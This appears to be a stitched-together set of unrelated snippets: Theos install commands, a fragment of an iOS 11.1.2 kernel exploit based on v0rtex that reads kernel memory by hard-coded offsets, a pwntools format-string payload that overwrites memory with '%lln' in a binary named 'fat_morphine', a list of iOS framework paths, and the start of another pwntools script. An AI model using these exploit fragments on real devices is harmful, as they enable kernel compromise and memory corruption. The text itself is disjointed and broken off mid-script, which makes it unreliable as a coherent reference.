brew install dpkg ldid
cd ~
git clone --recursive https://github.com/theos/theos.git
echo "export THEOS=~/theos" >> .bash_profile
/*
 Offsets from iOS 11.1.2 iPhone 6+
 Insert the following after line 680 in async_wait.c
 Mostly from Siguza's v0rtex
*/
mach_ports_register(mach_task_self(), &user_client, 1);
uint64_t IOSurfaceRootUserClient_port = rk64(task_addr + 0x2e8 + 0x8); // 0x2e8 = OFFSET_TASK_ITK_REGISTERED, second port in the list
uint64_t IOSurfaceRootUserClient_addr = rk64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_addr);
from pwn import *
bin_path = "./fat_morphine"
payload = ""
payload += "%4196134x"      # What we are writing
payload += "%{}$lln"        # How we write it
payload += "\x30\x0d\x60"   # Where we write it
payload = payload.format(10)
Added:
- /System/Library/AccessibilityBundles/AXActionSheetUIServer.axuiservice/AXActionSheetUIServer
- /System/Library/Frameworks/AuthenticationServices.framework/AuthenticationServices
- /System/Library/Frameworks/CarPlay.framework/CarPlay
- /System/Library/Frameworks/CoreServices.framework/CoreServices
- /System/Library/Frameworks/CoreTelephony.framework/Support/libSystemDetermination.dylib
- /System/Library/Frameworks/GLKit.framework/GLKit
- /System/Library/Frameworks/IdentityLookupUI.framework/IdentityLookupUI
- /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSRayIntersector.framework/MPSRayIntersector
- /System/Library/Frameworks/NaturalLanguage.framework/NaturalLanguage
from pwn import *
bin_path = "./neo_boffy"
# Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
context(log_level="ERROR")
# Can't send NULLs, but can send empty strings
def cmdify(s): return s.split("\x00")